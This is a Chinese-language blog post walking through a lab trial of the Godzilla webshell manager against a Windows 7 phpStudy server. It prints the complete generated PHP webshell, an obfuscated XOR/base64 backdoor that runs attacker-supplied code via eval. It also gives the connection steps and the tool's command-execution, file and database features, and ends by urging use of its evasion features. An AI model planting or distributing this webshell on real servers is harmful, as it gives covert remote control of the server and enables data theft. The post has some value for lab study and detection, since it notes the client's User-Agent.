PJzhang:哥斯拉webshell管理工具试用

猫宁~~~

操作系统kali linux

https://github.com/BeichenDream/Godzilla
https://github.com/BeichenDream/Godzilla/releases
https://github.com/BeichenDream/Godzilla/releases/download/v1.10-godzilla/Godzilla-V1.10.jar

kali linux上已经有java环境

java -jar /root/Desktop/Godzilla-V1.10.jar

kali linux系统IP 10.108.18.98

windows 7系统IP 10.108.18.99

windows 7采用phpstudy启用wamp

webshell客户端，菜单管理项，生成 php类的webshell，加密器php_xor_base64

连接密码和密钥都是xiaozhupeiqi

生成xiaozhupeiqi.php

内容如下：

<?php
    session_start();
    @set_time_limit(0);
    @error_reporting(0);
    function E($D,$K){
        for($i=0;$i<strlen($D);$i++) {
            $D[$i] = $D[$i]^$K[$i+1&15];
        }
        return $D;
    }
    function Q($D){
        return base64_encode($D);
    }
    function O($D){
        return base64_decode($D);
    }
    $P='xiaozhupeiqi';
    $V='payload';
    $T='620157faf8ab159f';
    if (isset($_POST[$P])){
        $F=O(E(O($_POST[$P]),$T));
        if (isset($_SESSION[$V])){
            $L=$_SESSION[$V];
            $A=explode('|',$L);
            class C{public function nvoke($p) {eval($p."");}}
            $R=new C();
            $R->nvoke($A[0]);
            echo substr(md5($P.$T),0,16);
            echo Q(E(@run($F),$T));
            echo substr(md5($P.$T),16);
        }else{
            $_SESSION[$V]=$F;
        }
    }

http://10.108.18.99/xiaozhupeiqi.php

菜单栏目标选项添加

填写链接，密码和密钥

有效载荷php，加密方式php_xor_base64

测试连接成功

进入webshell管理界面

有基础信息，命令执行，文件管理，数据库管理等功能可以使用。

默认不设置代理，代理设置127.0.0.1 8081 http，burpsuite proxy的options对应设置，可以通过测试抓取流量

哥斯拉webshell客户端对应UA是User-Agent: Java/11.0.7-ea

充分利用其中的绕过功能，利用好webshell客户端工具。

over~~~